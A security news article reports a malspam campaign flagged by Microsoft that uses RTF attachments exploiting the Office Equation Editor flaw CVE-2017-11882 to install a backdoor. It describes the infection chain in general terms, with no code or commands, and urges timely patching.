Microsoft is warning users to be on the lookout for a malspam campaign that’s abusing an Office vulnerability in order to distribute a backdoor.
On 7 June, Microsoft Security Intelligence took to Twitter to raise awareness of the operation. The campaign, which remains active as of this writing, begins when users receive a malspam email in one of several different European languages. Each of these emails attempt to trick users into opening an attached RTF document.
An active malware campaign using emails in European languages distributes RTF files that carry the CVE-2017-11882 exploit, which allows attackers to automatically run malicious code without requiring user interaction. pic.twitter.com/Ac6dYG9vvw
— Microsoft Security Intelligence (@MsftSecIntel) June 7, 2019
This file moves the infection chain forward by exploiting CVE-2017-11882. Fixed by Microsoft in November 2017, the vulnerability consists of a stack-based overflow flaw that resides in Microsoft Equation Editor (EQNEDT32.EXE). Based on this location, digital security firm Embedi found that the security flaw affected all versions of Microsoft Office, Microsoft Windows and architecture types dating back to 2000.
The security weakness enables a bad actor to execute arbitrary code on a vulnerable machine. In Embedi’s analysis, for instance, researchers found a digital attacker could easily launch a file from the WebDAV server under their control as well as use an OLE auto-update to exploit the flaw without any user interaction. Just a few weeks after Microsoft issued its fix, researchers spotted another campaign leveraging a component of the Cobalt Strike penetration tool to abuse the vulnerability and infect unpatched systems with malware.
In this newly wave of attacks, the malicious RTF file downloads and then runs scripts of VBScript, PowerShell and others to download a backdoor payload. This backdoor then attempts to connect to a malicious domain, a location which was down at the time of Microsoft Security Intelligence’s warning.
The fact that digital attacks continue to leverage exploit code for old vulnerabilities like CVE-2017-11882 highlights the need for organizations to keep their software up-to-date by investing in their vulnerability management capabilities. They might also want to consider strengthening their ability to detect advanced malware that leverage software-based flaws as an attack vector.